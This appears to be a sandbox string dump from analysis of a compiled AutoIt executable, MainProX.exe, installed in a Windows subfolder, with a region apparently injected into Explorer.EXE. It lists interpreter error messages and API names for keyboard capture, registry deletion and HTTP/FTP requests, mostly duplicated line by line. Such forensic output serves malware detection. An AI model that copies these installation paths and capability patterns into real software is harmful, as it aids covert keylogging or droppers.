Invalid file filter given.*Expected a variable in user function call.1"Do" statement has no matching "Until" statement.2"Until" statement with no matching "Do" statement.#"For" statement is badly formatted.2"Next" statement with no matching "For" statement.N"ExitLoop/ContinueLoop" statements only valid from inside a For/Do/While loop.1"For" statement has no matching "Next" statement.@"Case" statement with no matching "Select"or "Switch" statement.:"EndSelect" statement with no matching "Select" statement.ORecursion level has been exceeded - AutoIt will quit to prevent stack overflow.&Cannot make existing variables static.4Cannot make static variables into regular variables.
Invalid file filter given.*Expected a variable in user function call.1"Do" statement has no matching "Until" statement.2"Until" statement with no matching "Do" statement.#"For" statement is badly formatted.2"Next" statement with no matching "For" statement.N"ExitLoop/ContinueLoop" statements only valid from inside a For/Do/While loop.1"For" statement has no matching "Next" statement.@"Case" statement with no matching "Select"or "Switch" statement.:"EndSelect" statement with no matching "Select" statement.ORecursion level has been exceeded - AutoIt will quit to prevent stack overflow.&Cannot make existing variables static.4Cannot make static variables into regular variables.
3This keyword cannot be used after a "Then" keyword.>"Select" statement is missing "EndSelect" or "Case" statement. "If" statements must have a "Then" keyword. Badly formated Struct statement."Cannot assign values to constants..Cannot make existing variables into constants.9Only Object-type variables allowed in a "With" statement.v"long_ptr", "int_ptr" and "short_ptr" DllCall() types have been deprecated. Use "long*", "int*" and "short*" instead.-Object referenced outside a "With" statement.)Nested "With" statements are not allowed."Variable must be of type "Object".1The requested action with this object has failed.8Variable appears more than once in function declaration.2ReDim array can not be initialized in this manner.1An array variable can not be used in this manner.
3This keyword cannot be used after a "Then" keyword.>"Select" statement is missing "EndSelect" or "Case" statement. "If" statements must have a "Then" keyword. Badly formated Struct statement."Cannot assign values to constants..Cannot make existing variables into constants.9Only Object-type variables allowed in a "With" statement.v"long_ptr", "int_ptr" and "short_ptr" DllCall() types have been deprecated. Use "long*", "int*" and "short*" instead.-Object referenced outside a "With" statement.)Nested "With" statements are not allowed."Variable must be of type "Object".1The requested action with this object has failed.8Variable appears more than once in function declaration.2ReDim array can not be initialized in this manner.1An array variable can not be used in this manner.
Can not redeclare a constant.5Can not redeclare a parameter inside a user function.HCan pass constants by reference only to parameters with "Const" keyword.*Can not initialize a variable with itself.$Incorrect way to use this parameter.:"EndSwitch" statement with no matching "Switch" statement.>"Switch" statement is missing "EndSwitch" or "Case" statement.H"ContinueCase" statement with no matching "Select"or "Switch" statement.
Can not redeclare a constant.5Can not redeclare a parameter inside a user function.HCan pass constants by reference only to parameters with "Const" keyword.*Can not initialize a variable with itself.$Incorrect way to use this parameter.:"EndSwitch" statement with no matching "Switch" statement.>"Switch" statement is missing "EndSwitch" or "Case" statement.H"ContinueCase" statement with no matching "Select"or "Switch" statement.
String missing closing quote.!Badly formated variable or macro.*Missing separator character after keyword.
String missing closing quote.!Badly formated variable or macro.*Missing separator character after keyword.
MainProX.exe_600_rwx_00401000_000DF000:
PSSSSSSh
PSSSSSSh
Gt.Ht$
Gt.Ht$
PSSSh@
PSSSh@
PVSSh@
PVSSh@
f;Crt
f;Crt
?#%X.y
?#%X.y
GetProcessWindowStation
GetProcessWindowStation
operator
operator
This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.
This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.
kernel32.dll
kernel32.dll
oleaut32.dll
oleaut32.dll
RegDeleteKeyExW
RegDeleteKeyExW
advapi32.dll
advapi32.dll
Error text not found (please report)
Error text not found (please report)
operand of unlimited repeat could match the empty string
operand of unlimited repeat could match the empty string
POSIX named classes are supported only within a class
POSIX named classes are supported only within a class
erroffset passed as NULL
erroffset passed as NULL
POSIX collating elements are not supported
POSIX collating elements are not supported
this version of PCRE is compiled without UTF support
this version of PCRE is compiled without UTF support
PCRE does not support \L, \l, \N{name}, \U, or \u
PCRE does not support \L, \l, \N{name}, \U, or \u
support for \P, \p, and \X has not been compiled
support for \P, \p, and \X has not been compiled
this version of PCRE is not compiled with Unicode property support
this version of PCRE is not compiled with Unicode property support
\N is not supported in a class
\N is not supported in a class
zcÃ
zcÃ
.zV:b
.zV:b
GetProcessHeap
GetProcessHeap
CreatePipe
CreatePipe
GetWindowsDirectoryW
GetWindowsDirectoryW
GetCPInfo
GetCPInfo
RegDeleteKeyW
RegDeleteKeyW
RegEnumKeyExW
RegEnumKeyExW
RegCreateKeyExW
RegCreateKeyExW
RegOpenKeyExW
RegOpenKeyExW
RegCloseKey
RegCloseKey
SetViewportOrgEx
SetViewportOrgEx
ShellExecuteExW
ShellExecuteExW
SHFileOperationW
SHFileOperationW
ShellExecuteW
ShellExecuteW
RegisterHotKey
RegisterHotKey
GetKeyboardLayoutNameW
GetKeyboardLayoutNameW
ExitWindowsEx
ExitWindowsEx
EnumThreadWindows
EnumThreadWindows
UnregisterHotKey
UnregisterHotKey
keybd_event
keybd_event
GetAsyncKeyState
GetAsyncKeyState
SetKeyboardState
SetKeyboardState
GetKeyboardState
GetKeyboardState
GetKeyState
GetKeyState
VkKeyScanW
VkKeyScanW
EnumWindows
EnumWindows
EnumChildWindows
EnumChildWindows
MapVirtualKeyW
MapVirtualKeyW
CloseWindowStation
CloseWindowStation
SetProcessWindowStation
SetProcessWindowStation
OpenWindowStationW
OpenWindowStationW
InternetCrackUrlW
InternetCrackUrlW
HttpQueryInfoW
HttpQueryInfoW
HttpOpenRequestW
HttpOpenRequestW
HttpSendRequestW
HttpSendRequestW
FtpOpenFileW
FtpOpenFileW
FtpGetFileSize
FtpGetFileSize
InternetOpenUrlW
InternetOpenUrlW
##@,&,//,))
##@,&,//,))
.jQE2
.jQE2
4`%ud*
4`%ud*
3(-,'')-*/%'
3(-,'')-*/%'
9(***3).**-)'
9(***3).**-)'
H%d=j@
H%d=j@
0!;....(
0!;....(
.text
.text
`.rdata
`.rdata
@.data
@.data
.rsrc
.rsrc
@.reloc
@.reloc
mscoree.dll
mscoree.dll
combase.dll
combase.dll
- CRT not initialized
- CRT not initialized
- Attempt to initialize the CRT more than once.
- Attempt to initialize the CRT more than once.
- floating point support not loaded
- floating point support not loaded
USER32.DLL
USER32.DLL
>>>AUTOIT NO CMDEXECUTE
>>>AUTOIT NO CMDEXECUTE
CMDLINERAW
CMDLINERAW
CMDLINE
CMDLINE
/AutoIt3ExecuteLine
/AutoIt3ExecuteLine
/AutoIt3ExecuteScript
/AutoIt3ExecuteScript
APPSKEY
APPSKEY
789:;?
789:;?
FTPSETPROXY
FTPSETPROXY
GUICTRLRECVMSG
GUICTRLRECVMSG
GUICTRLSENDMSG
GUICTRLSENDMSG
GUIGETMSG
GUIGETMSG
GUIREGISTERMSG
GUIREGISTERMSG
HOTKEYSET
HOTKEYSET
HTTPSETPROXY
HTTPSETPROXY
HTTPSETUSERAGENT
HTTPSETUSERAGENT
ISKEYWORD
ISKEYWORD
MSGBOX
MSGBOX
REGENUMKEY
REGENUMKEY
SHELLEXECUTE
SHELLEXECUTE
SHELLEXECUTEWAIT
SHELLEXECUTEWAIT
TCPACCEPT
TCPACCEPT
TCPCLOSESOCKET
TCPCLOSESOCKET
TCPCONNECT
TCPCONNECT
TCPLISTEN
TCPLISTEN
TCPNAMETOIP
TCPNAMETOIP
TCPRECV
TCPRECV
TCPSEND
TCPSEND
TCPSHUTDOWN
TCPSHUTDOWN
TCPSTARTUP
TCPSTARTUP
TRAYGETMSG
TRAYGETMSG
UDPBIND
UDPBIND
UDPCLOSESOCKET
UDPCLOSESOCKET
UDPOPEN
UDPOPEN
UDPRECV
UDPRECV
UDPSEND
UDPSEND
UDPSHUTDOWN
UDPSHUTDOWN
UDPSTARTUP
UDPSTARTUP
SendKeyDelay
SendKeyDelay
SendKeyDownDelay
SendKeyDownDelay
TCPTimeout
TCPTimeout
WINDOWSDIR
WINDOWSDIR
AUTOITEXE
AUTOITEXE
HOTKEYPRESSED
HOTKEYPRESSED
D%s (%d) : ==> %s.:
D%s (%d) : ==> %s.:
Line %d:
Line %d:
Line %d (File "%s"):
Line %d (File "%s"):
%s (%d) : ==> %s:
%s (%d) : ==> %s:
AutoIt script files (*.au3, *.a3x)
AutoIt script files (*.au3, *.a3x)
*.au3;*.a3x
*.au3;*.a3x
All files (*.*)
All files (*.*)
04090000
04090000
%u.%u.%u.%u
%u.%u.%u.%u
0.0.0.0
0.0.0.0
Mddddd
Mddddd
"%s" (%d) : ==> %s:
"%s" (%d) : ==> %s:
\??\%s
\??\%s
GUI_RUNDEFMSG
GUI_RUNDEFMSG
AUTOITCALLVARIABLE%d
AUTOITCALLVARIABLE%d
255.255.255.255
255.255.255.255
Keyword
Keyword
AUTOIT.ERROR
AUTOIT.ERROR
Null Object assignment in FOR..IN loop
Null Object assignment in FOR..IN loop
Incorrect Object type in FOR..IN loop
Incorrect Object type in FOR..IN loop
3, 3, 9, 21
3, 3, 9, 21
HKEY_LOCAL_MACHINE
HKEY_LOCAL_MACHINE
HKEY_CLASSES_ROOT
HKEY_CLASSES_ROOT
HKEY_CURRENT_CONFIG
HKEY_CURRENT_CONFIG
HKEY_CURRENT_USER
HKEY_CURRENT_USER
HKEY_USERS
HKEY_USERS
%d/d/d
%d/d/d
c:\windows\jwxf\MainProX.exe
c:\windows\jwxf\MainProX.exe
%WinDir%\jwxf\MainProX.exe
%WinDir%\jwxf\MainProX.exe
AutoIt supports the __stdcall (WINAPI) and __cdecl calling conventions. The __stdcall (WINAPI) convention is used by default but __cdecl can be used instead. See the DllCall() documentation for details on changing the calling convention.
AutoIt supports the __stdcall (WINAPI) and __cdecl calling conventions. The __stdcall (WINAPI) convention is used by default but __cdecl can be used instead. See the DllCall() documentation for details on changing the calling convention.
Missing operator in expression."Unbalanced brackets in expression.
Missing operator in expression."Unbalanced brackets in expression.
Error parsing function call.0Incorrect number of parameters in function call.'"ReDim" used without an array variable.>Illegal text at the end of statement (one statement per line).1"If" statement has no matching "EndIf" statement.1"Else" statement with no matching "If" statement.2"EndIf" statement with no matching "If" statement.7Too many "Else" statements for matching "If" statement.3"While" statement has no matching "Wend" statement.4"Wend" statement with no matching "While" statement.%Variable used without being declared.XArray variable has incorrect number of subscripts or subscript dimension range exceeded.#Variable subscript badly formatted.*Subscript used on non-accessible variable.&Too many subscripts used for an array.0Missing subscript dimensions in "Dim" statement.NNo variable given for "Dim", "Local", "Global", "Struct" or "Const" statement.
Error parsing function call.0Incorrect number of parameters in function call.'"ReDim" used without an array variable.>Illegal text at the end of statement (one statement per line).1"If" statement has no matching "EndIf" statement.1"Else" statement with no matching "If" statement.2"EndIf" statement with no matching "If" statement.7Too many "Else" statements for matching "If" statement.3"While" statement has no matching "Wend" statement.4"Wend" statement with no matching "While" statement.%Variable used without being declared.XArray variable has incorrect number of subscripts or subscript dimension range exceeded.#Variable subscript badly formatted.*Subscript used on non-accessible variable.&Too many subscripts used for an array.0Missing subscript dimensions in "Dim" statement.NNo variable given for "Dim", "Local", "Global", "Struct" or "Const" statement.
0Expected a "=" operator in assignment statement.*Invalid keyword at the start of this line.
0Expected a "=" operator in assignment statement.*Invalid keyword at the start of this line.
Invalid element in a DllStruct.*Unknown option or bad parameter specified.&Unable to load the internet libraries./"Struct" statement has no matching "EndStruct".HUnable to open file, the maximum number of open files has been exceeded.K"ContinueLoop" statement with no matching "While", "Do" or "For" statement.
Invalid element in a DllStruct.*Unknown option or bad parameter specified.&Unable to load the internet libraries./"Struct" statement has no matching "EndStruct".HUnable to open file, the maximum number of open files has been exceeded.K"ContinueLoop" statement with no matching "While", "Do" or "For" statement.
Invalid file filter given.*Expected a variable in user function call.1"Do" statement has no matching "Until" statement.2"Until" statement with no matching "Do" statement.#"For" statement is badly formatted.2"Next" statement with no matching "For" statement.N"ExitLoop/ContinueLoop" statements only valid from inside a For/Do/While loop.1"For" statement has no matching "Next" statement.@"Case" statement with no matching "Select"or "Switch" statement.:"EndSelect" statement with no matching "Select" statement.ORecursion level has been exceeded - AutoIt will quit to prevent stack overflow.&Cannot make existing variables static.4Cannot make static variables into regular variables.
Invalid file filter given.*Expected a variable in user function call.1"Do" statement has no matching "Until" statement.2"Until" statement with no matching "Do" statement.#"For" statement is badly formatted.2"Next" statement with no matching "For" statement.N"ExitLoop/ContinueLoop" statements only valid from inside a For/Do/While loop.1"For" statement has no matching "Next" statement.@"Case" statement with no matching "Select"or "Switch" statement.:"EndSelect" statement with no matching "Select" statement.ORecursion level has been exceeded - AutoIt will quit to prevent stack overflow.&Cannot make existing variables static.4Cannot make static variables into regular variables.
3This keyword cannot be used after a "Then" keyword.>"Select" statement is missing "EndSelect" or "Case" statement. "If" statements must have a "Then" keyword. Badly formated Struct statement."Cannot assign values to constants..Cannot make existing variables into constants.9Only Object-type variables allowed in a "With" statement.v"long_ptr", "int_ptr" and "short_ptr" DllCall() types have been deprecated. Use "long*", "int*" and "short*" instead.-Object referenced outside a "With" statement.)Nested "With" statements are not allowed."Variable must be of type "Object".1The requested action with this object has failed.8Variable appears more than once in function declaration.2ReDim array can not be initialized in this manner.1An array variable can not be used in this manner.
3This keyword cannot be used after a "Then" keyword.>"Select" statement is missing "EndSelect" or "Case" statement. "If" statements must have a "Then" keyword. Badly formated Struct statement."Cannot assign values to constants..Cannot make existing variables into constants.9Only Object-type variables allowed in a "With" statement.v"long_ptr", "int_ptr" and "short_ptr" DllCall() types have been deprecated. Use "long*", "int*" and "short*" instead.-Object referenced outside a "With" statement.)Nested "With" statements are not allowed."Variable must be of type "Object".1The requested action with this object has failed.8Variable appears more than once in function declaration.2ReDim array can not be initialized in this manner.1An array variable can not be used in this manner.
Can not redeclare a constant.5Can not redeclare a parameter inside a user function.HCan pass constants by reference only to parameters with "Const" keyword.*Can not initialize a variable with itself.$Incorrect way to use this parameter.:"EndSwitch" statement with no matching "Switch" statement.>"Switch" statement is missing "EndSwitch" or "Case" statement.H"ContinueCase" statement with no matching "Select"or "Switch" statement.
Can not redeclare a constant.5Can not redeclare a parameter inside a user function.HCan pass constants by reference only to parameters with "Const" keyword.*Can not initialize a variable with itself.$Incorrect way to use this parameter.:"EndSwitch" statement with no matching "Switch" statement.>"Switch" statement is missing "EndSwitch" or "Case" statement.H"ContinueCase" statement with no matching "Select"or "Switch" statement.
String missing closing quote.!Badly formated variable or macro.*Missing separator character after keyword.
String missing closing quote.!Badly formated variable or macro.*Missing separator character after keyword.
Explorer.EXE_880_rwx_014E0000_00004000:
c:\windows\jwxf\YP.exe
c:\windows\jwxf\YP.exe
wmsvcrt
wmsvcrt
WinExec
WinExec
ShellExecuteExA
ShellExecuteExA
ShellExecuteExW
ShellExecuteExW
OpenWindowStationA
OpenWindowStationA
OpenWindowStationW
OpenWindowStationW
SetProcessWindowStation
SetProcessWindowStation
GetProcessWindowStation
GetProcessWindowStation
CloseWindowStation
CloseWindowStation
EnumWindows
EnumWindows
EnumThreadWindows
EnumThreadWindows
EnumChildWindows
EnumChildWindows
RegOpenKeyExA
RegOpenKeyExA
RegOpenKeyExW
RegOpenKeyExW
RegEnumKeyExA
RegEnumKeyExA
RegEnumKeyExW
RegEnumKeyExW
RegDeleteKeyA
RegDeleteKeyA
RegDeleteKeyW
RegDeleteKeyW
RegCloseKey
RegCloseKey
HttpOpenRequestA
HttpOpenRequestA
HttpOpenRequestW
HttpOpenRequestW
HttpEndRequestA
HttpEndRequestA
HttpEndRequestW
HttpEndRequestW
HttpQueryInfoA
HttpQueryInfoA
HttpQueryInfoW
HttpQueryInfoW
UrlUnescapeA
UrlUnescapeA
UrlUnescapeW
UrlUnescapeW